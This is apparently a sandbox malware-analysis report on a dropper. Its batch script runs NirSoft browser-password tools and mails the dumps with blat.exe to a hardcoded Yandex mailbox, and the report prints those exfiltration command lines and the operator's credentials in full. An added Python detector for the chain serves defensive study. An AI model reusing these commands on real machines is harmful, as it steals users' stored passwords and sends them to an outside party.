Source: ChromePass.exe, ChromePass.exe, 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';'FROM sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: ChromePass.exe, 0000000F.00000003.1785680506.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: ChromePass.exe, ChromePass.exe, 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: 0zu73p2YBu.exeReversingLabs: Detection: 100%
              Source: .exeString found in binary or memory: tername%_iepv.txt ping -n 3 127.0.0.1 > nul start ChromePass.exe /stext %computername%_ChromePass.txt ping -n 120 127.0.0.1 > nul blat.exe -install -server smtp.yandex.ru -port 587 -f alexandrKondratiev5@yandex.ru -u alexandrKondratiev5 -pw qwerty5
              Source: .exeString found in binary or memory: -installIMAP
              Source: .exeString found in binary or memory: -install
              Source: .exeString found in binary or memory: -installSMTP
              Source: .exeString found in binary or memory: -installNNTP
              Source: .exeString found in binary or memory: -installPOP3
              Source: .exeString found in binary or memory: %s------------Start of Session-----------------
              Source: .exeString found in binary or memory: To set the SMTP server's name/address and your username/email address for that server machine do: blat -install server_name your_email_address or use '-server <server_name>' and '-f <your_email_address>'
              Source: .exeString found in binary or memory: To set the SMTP server's name/address and your username/email address for that server machine do: blat -install server_name your_email_address or use '-server <server_name>' and '-f <your_email_address>'
              Source: .exeString found in binary or memory: Profiles are listed as in the -install option:
              Source: .exeString found in binary or memory: To modify IMAP: blat -installIMAP IMAPHost - - [Port [Profile
              Source: .exeString found in binary or memory: To modify POP3: blat -installPOP3 POP3Host - - [Port [Profile
              Source: .exeString found in binary or memory: To modify NNTP: blat -installNNTP NNTPHost Sender [Try [Port [Profile
              Source: .exeString found in binary or memory: or: blat -installSMTP SMTPHost Sender [Try [Port [Profile
              Source: .exeString found in binary or memory: To modify SMTP: blat -install SMTPHost Sender [Try [Port [Profile [Login name
              Source: .exeString found in binary or memory: use -installIMAP for storing IMAP information
              Source: .exeString found in binary or memory: use -installPOP3 for storing POP3 information
              Source: .exeString found in binary or memory: use -installNNTP for storing NNTP information
              Source: .exeString found in binary or memory: same parameters as -install, and is only for SMTP settings.
              Source: .exeString found in binary or memory: : displays this help (also -?, /?, -help or /help)
              Source: .exeString found in binary or memory: -help
              Source: .exeString found in binary or memory: Blat -install <server addr> <sender's addr> [<try>[<port>[<profile>]]] [-q]
              Source: .exeString found in binary or memory: To set the NNTP server's address and the user name at that address do: blat -installNNTP server username
              Source: .exeString found in binary or memory: To set the POP3 server's address and the login name at that address do: blat -installPOP3 server - - - - loginname loginpwd
              Source: .exeString found in binary or memory: To set the IMAP server's address and the login name at that address do: blat -installIMAP server - - - - loginname loginpwd
              Source: PasswordFox.exeString found in binary or memory: /installfolder
Source: blat.exe | String found in binary or memory: Profiles are listed as in the -install option:
Source: blat.exe | String found in binary or memory: To modify IMAP: blat -installIMAP IMAPHost - - [Port [Profile
Source: blat.exe | String found in binary or memory: -install
Source: blat.exe | String found in binary or memory: To set the POP3 server's address and the login name at that address do: blat -installPOP3 server - - - - loginname loginpwd
Source: blat.exe | String found in binary or memory: To set the IMAP server's address and the login name at that address do: blat -installIMAP server - - - - loginname loginpwd
Source: blat.exe | String found in binary or memory: To modify POP3: blat -installPOP3 POP3Host - - [Port [Profile
Source: blat.exe | String found in binary or memory: To modify NNTP: blat -installNNTP NNTPHost Sender [Try [Port [Profile
Source: blat.exe | String found in binary or memory: %s------------Start of Session-----------------
Source: blat.exe | String found in binary or memory: To set the SMTP server's name/address and your username/email address for that server machine do: blat -install server_name your_email_address or use '-server <server_name>' and '-f <your_email_address>'
Source: blat.exe | String found in binary or memory: To set the NNTP server's address and the user name at that address do: blat -installNNTP server username
Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Evasive API call chain: __getmainargs,DecisionNodes,exitgraph_13-4413
Source: unknown | Process created: C:\Users\user\Desktop\0zu73p2YBu.exe "C:\Users\user\Desktop\0zu73p2YBu.exe"
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Process created: C:\Users\user\AppData\Local\Temp\ .exe "C:\Users\user\AppData\Local\Temp\ .exe"
Source: C:\Users\user\AppData\Local\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\600.tmp\ip.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe OperaPassView.exe /stext user-PC_OperaPassView.txt
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe PasswordFox.exe /stext user-PC_PasswordFox.txt
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe iepv.exe /stext user-PC_iepv.txt
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe ChromePass.exe /stext user-PC_ChromePass.txt
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 120 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe blat.exe -install -server smtp.yandex.ru -port 587 -f alexandrKondratiev5@yandex.ru -u alexandrKondratiev5 -pw qwerty5
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe blat.exe -to alexandrKondratiev5@yandex.ru -subject "Opera" -attachi "user-PC_OperaPassView.txt" -body "Opera"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe blat.exe -to alexandrKondratiev5@yandex.ru -subject "Fox" -attachi "user-PC_PasswordFox.txt" -body "Fox"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe blat.exe -to alexandrKondratiev5@yandex.ru -subject "ie" -attachi "user-PC_iepv.txt" -body "ie"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe blat.exe -to alexandrKondratiev5@yandex.ru -subject "Chrome" -attachi "user-PC_ChromePass.txt" -body "Chrome"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
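The cmd.exe children above are the entire ip.bat: each NirSoft recovery tool is run with /stext to write its dump to a %computername%-prefixed text file, `ping -n N 127.0.0.1` pads the sequence (the 120-echo ping in front of the first blat call alone is about two minutes), then blat.exe installs an SMTP profile with the operator's hardcoded credentials and mails each dump as an attachment. The following is an added example (not code from the report, from Joe Sandbox or from the sample) of how a detection engineer would express that chain as correlated rules over process-creation telemetry. The log rows are constructed to mirror the report's process list (plus one benign ping to a non-loopback host), and the rule names, the field layout and the helper names are this example's assumptions.

```python
"""Added example: detect the ping-sleep / NirSoft /stext / blat SMTP exfiltration chain in
process-creation telemetry. The log rows, rule names and field layout are this example's
own construction, modelled on the cmd.exe children listed in this report."""
import re
from collections import defaultdict

# Constructed sample log: (pid, ppid, image path, command line). The rows mirror the
# report's process list; the last row is a benign ping added so the sleep rule is seen
# not to fire on an ordinary connectivity check.
PROCESS_LOG = [
    (300, 200, r"C:\Windows\SysWOW64\cmd.exe",
     r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\600.tmp\ip.bat" "'),
    (301, 300, r"C:\Windows\SysWOW64\PING.EXE", "ping -n 3 127.0.0.1"),
    (302, 300, r"C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe",
     "OperaPassView.exe /stext user-PC_OperaPassView.txt"),
    (303, 300, r"C:\Windows\SysWOW64\PING.EXE", "ping -n 3 127.0.0.1"),
    (304, 300, r"C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe",
     "PasswordFox.exe /stext user-PC_PasswordFox.txt"),
    (305, 300, r"C:\Windows\SysWOW64\PING.EXE", "ping -n 3 127.0.0.1"),
    (306, 300, r"C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe", "iepv.exe /stext user-PC_iepv.txt"),
    (307, 300, r"C:\Windows\SysWOW64\PING.EXE", "ping -n 3 127.0.0.1"),
    (308, 300, r"C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe",
     "ChromePass.exe /stext user-PC_ChromePass.txt"),
    (309, 300, r"C:\Windows\SysWOW64\PING.EXE", "ping -n 120 127.0.0.1"),
    (310, 300, r"C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe",
     "blat.exe -install -server smtp.yandex.ru -port 587 -f alexandrKondratiev5@yandex.ru "
     "-u alexandrKondratiev5 -pw qwerty5"),
    (311, 300, r"C:\Windows\SysWOW64\PING.EXE", "ping -n 3 127.0.0.1"),
    (312, 300, r"C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe",
     'blat.exe -to alexandrKondratiev5@yandex.ru -subject "Opera" -attachi "user-PC_OperaPassView.txt" -body "Opera"'),
    (313, 300, r"C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe",
     'blat.exe -to alexandrKondratiev5@yandex.ru -subject "Chrome" -attachi "user-PC_ChromePass.txt" -body "Chrome"'),
    (400, 350, r"C:\Windows\System32\PING.EXE", "ping -n 4 10.0.0.1"),   # benign noise
]

LOOPBACK = {"127.0.0.1", "localhost", "::1"}


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted arguments as one token."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def opt(tokens, *flags):
    """Value following the first token equal to one of the (lowercase) flags, else None."""
    for i in range(len(tokens) - 1):
        if tokens[i].lower() in flags:
            return tokens[i + 1]
    return None


def analyze(log):
    """Return (findings, per_parent): findings is [(pid, rule, detail)], per_parent correlates
    loopback-ping sleeps, /stext credential dumps and blat attachments under each parent."""
    findings = []
    per_parent = defaultdict(lambda: {"sleep_s": 0, "dumps": {}, "exfil": [], "verdict": None})
    for pid, ppid, image, cmdline in log:
        exe = image.rsplit("\\", 1)[-1].lower()
        toks = tokenize(cmdline)
        low = [t.lower() for t in toks]
        state = per_parent[ppid]
        if exe == "ping.exe":
            count, target = opt(toks, "-n"), (toks[-1] if toks else "")
            if target.lower() in LOOPBACK and count and count.isdigit():
                state["sleep_s"] += int(count)     # -n N against loopback: roughly N-1 s of delay
                findings.append((pid, "ping_sleep", f"{count} echoes to {target}"))
        elif "/stext" in low:                      # NirSoft tools dump to a text file with /stext
            out = opt(toks, "/stext")
            if out:
                state["dumps"][out.lower()] = exe
                findings.append((pid, "nirsoft_stext_dump", f"{exe} -> {out}"))
        elif exe == "blat.exe":
            if "-install" in low and opt(toks, "-server"):
                # Report that a credential was embedded; never copy the password into the alert.
                findings.append((pid, "smtp_profile_install",
                                 f"server={opt(toks, '-server')} user={opt(toks, '-u')} "
                                 f"password_present={opt(toks, '-pw') is not None}"))
            attached = opt(toks, "-attach", "-attachi", "-attacht", "-attachb")
            if attached and attached.lower() in state["dumps"]:
                state["exfil"].append(attached)
                findings.append((pid, "smtp_exfil_of_dump",
                                 f"{state['dumps'][attached.lower()]} output mailed to {opt(toks, '-to')}"))
    for state in per_parent.values():
        if state["dumps"] and state["exfil"]:      # a dump that is then mailed: the full chain
            state["verdict"] = "credential_theft_smtp_exfil"
    return findings, per_parent


if __name__ == "__main__":
    found, parents = analyze(PROCESS_LOG)
    for pid, rule, detail in found:
        print(f"pid {pid}: {rule}: {detail}")
    for ppid, state in parents.items():
        print(f"parent {ppid}: sleep budget {state['sleep_s']} s, verdict {state['verdict']}")
```

Correlating on the parent pid is what keeps the false-positive rate down: a lone loopback ping or a single NirSoft tool run by an admin is weak evidence, but a /stext dump followed by a blat attachment of the same file under one cmd.exe is the chain this report shows. On a real host the artifacts to collect are the %computername%_*.txt dumps and the 600.tmp folder, plus the SMTP profile that blat -install leaves behind (Blat keeps it in the registry under its own key), which contains the operator's mailbox credentials in clear.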
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\ .exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: twinui.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: mrmcorer.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: bcp47mrm.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.ui.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windowmanagementapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: inputhost.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: gssapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: gssapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
              Source: Binary string: z:\Projects\VS2005\OperaPassView\Release\OperaPassView.pdb source: OperaPassView.exe, OperaPassView.exe, 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: .pdb?P source: .exe, 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, OperaPassView.exe, 00000009.00000000.1722119973.000000000040E000.00000080.00000001.01000000.0000000D.sdmp, OperaPassView.exe.1.dr
              Source: Binary string: z:\Projects\VS2005\iepv\Release\iepv.pdb source: iepv.exe, iepv.exe, 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: z:\Projects\VS2005\PasswordFox\Release\PasswordFox.pdb source: PasswordFox.exe, PasswordFox.exe, 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: z:\Projects\VS2005\ChromePass\Release\ChromePass.pdb source: ChromePass.exe, ChromePass.exe, 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp
              Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Code function: 0_2_00401340 LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetEnvironmentVariableA | 0_2_00401340
              Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_00478046 push eax; ret | 1_2_00478074
              Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_0045702F push 8B100241h; iretd | 1_2_00457034
              Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_0045A096 push eax; ret | 1_2_0045A0C4
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe | Code function: 9_2_0040B9F0 push eax; ret | 9_2_0040BA04
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe | Code function: 9_2_0040B9F0 push eax; ret | 9_2_0040BA2C
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe | Code function: 9_2_0040B9BD push ecx; ret | 9_2_0040B9CD
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe | Code function: 11_2_00416181 push es; ret | 11_2_00416183
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe | Code function: 11_2_0041658D push ds; ret | 11_2_0041658E
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe | Code function: 11_2_0040B759 push ecx; ret | 11_2_0040B769
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe | Code function: 11_2_0040B780 push eax; ret | 11_2_0040B794
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe | Code function: 11_2_0040B780 push eax; ret | 11_2_0040B7BC
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Code function: 13_2_0040D740 push eax; ret | 13_2_0040D754
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Code function: 13_2_0040D740 push eax; ret | 13_2_0040D77C
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Code function: 13_2_0040D721 push ecx; ret | 13_2_0040D731
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_0042B0D9 push ecx; ret | 15_2_0042B0E9
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_0042B210 push eax; ret | 15_2_0042B224
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_0042B210 push eax; ret | 15_2_0042B24C
              Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_00430644 push eax; ret | 15_2_00430649
